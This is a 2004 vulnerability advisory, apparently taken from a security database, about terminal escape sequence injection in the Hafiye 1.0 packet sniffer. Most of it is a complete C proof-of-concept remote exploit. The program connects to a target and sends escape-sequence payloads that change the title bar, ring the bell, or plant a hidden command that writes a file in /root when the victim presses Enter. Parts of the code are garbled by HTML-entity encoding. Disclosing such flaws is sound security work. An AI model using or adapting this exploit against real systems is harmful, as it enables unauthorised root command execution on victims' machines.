Hafiye 1.0 Terminal Escape Sequence Injection Vulnerability

2004-08-25T00:00:00
ID SECURITYVULNS:DOC:6648
Type securityvulns
Reporter Securityvulns
Modified 2004-08-25T00:00:00

Description

+-------[ Software ]--------------+

Hafiye [1.0] "POSIX-compliant, customizable TCP/IP packet sniffer."

+-------[ Tested Versions ]--------------+

Hafiye[1.0] Tested on:Linux(Hafiye compiled from tarball) FreeBSD 4.7 (Installed from CD)

+-------[ Vulnerability ]--------------+

Packet Payload Terminal Escape Sequence Injection Vulnerability.

Results: DoS/Remote Root Comprimise

+-------[ Description ]--------------+

Hafiye[1.0] is a POSIX-compliant, customizable TCP/IP packet sniffer. It runs with uid0 privilege.

Hafiye-1.0 doesnt filter the payload when printing it to the terminal. A malicious attacker can send packets with escape sequence payloads to exploit this vulnerability.

If Hafiye has been started with -n packet count option , the vulnerability could allow remote code execution. For remote code execution the victim must press Enter after program exit.

+-------[ Contact ]--------------+

http://deicide.siyahsapka.org

     deicide@siyahsapka.org

+-------[ Proof Of Concept Exploit ]--------------+

/ Remote Exploit for Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability Written by Serkan Akpolat Homepage: http://deicide.siyahsapka.org E-mail: deicide@siyahsapka.org Greets: Virulent, gorny and all other netricians /

include <stdio.h>

include <sys/types.h>

include <string.h>

include <unistd.h>

include <sys/socket.h>

include <netdb.h>

include <stdlib.h>

typedef struct _target { char *host; u_short port; unsigned int sequence; unsigned int cnt; } target;

char *esc_sequence[]= {"Escape Sequences", "\x1b""]2;Insecure?""\x07\x0a", "\x07\x07\x07\x07\x07\x07", "\x1b""]2;;echo Owned > /root/Owned.txt" "\x07\x1b""[21t""\x1b""]2;xterm""\x07" "Abnormal Termination""\x1b" "[8m;""\x0a"};

char use[] ="\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n" "\t Escape Sequences :\n" "\t1-Change TitleBar Text to \"Insecure?\"\n" "\t2-Ring The Bell\n" "\t3-Hidden Prompt to Create Owned.txt in /root\n" "\tExample: ./exp -h 192.168.0.3 -p 80 -e 1 -l 1\n";

void usage() { printf("%s",use); exit(1); }

int connect_to_host(char host, u_short port) { int sock = 0; struct hostent hp; struct sockaddr_in sa;

 memset&#40;&sa, 0, sizeof&#40;sa&#41;&#41;;

 hp = gethostbyname&#40;host&#41;;
 if &#40;hp == NULL&#41; {
     herror&#40;&quot;Error:&quot;&#41;;
    exit&#40;1&#41;;
 }
 sa.sin_family = AF_INET;
 sa.sin_port = htons&#40;port&#41;;
 sa.sin_addr = **&#40;&#40;struct in_addr **&#41; hp-&gt;h_addr_list&#41;;

 sock = socket&#40;AF_INET, SOCK_STREAM, 0&#41;;
 if &#40;sock &lt; 0&#41;
     exit&#40;1&#41;;

 if &#40;connect&#40;sock, &#40;struct sockaddr *&#41; &sa, sizeof&#40;sa&#41;&#41; &lt; 0&#41;
     exit&#40;1&#41;;

 printf&#40;&quot;[+] Connected to &#37;s&#92;n&quot;, host&#41;;
 return sock;

}

int main(int argc, char **argv) { int i; int sock = 0; char buf[256]="\0"; target target; memset(&target,0,sizeof(target)); while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) { switch (i) { case 'h': target.host = optarg; break; case 'p': target.port = (u_short)atoi(optarg); break; case 'e': target.sequence = atoi(optarg); if(target.sequence < 1 || target.sequence > 3) { usage(); } break; case 'l': target.cnt=atoi(optarg); if(target.cnt<1) { target.cnt=1; } break; case ':': case '?': default: usage(); exit(1); } } if (optind != argc || !target.host || !target.port || !target.sequence || !target.cnt) { usage(); }

 sock = connect_to_host&#40;target.host, target.port&#41;;
 strncpy&#40;buf,esc_sequence[target.sequence],sizeof&#40;buf&#41;-1&#41;;


 printf&#40;&quot;[+] Sending Escape Sequences&#92;n&quot;&#41;;
 do {
     if &#40;send&#40;sock, buf, strlen&#40;buf&#41;, 0&#41; &lt; 0&#41; {
         printf&#40;&quot;Socket Error&#92;n&quot;&#41;;
         exit&#40;1&#41;;
     }
     target.cnt--;
 } while&#40;target.cnt &gt; 0&#41;;
 close&#40;sock&#41;;
 return 0;

}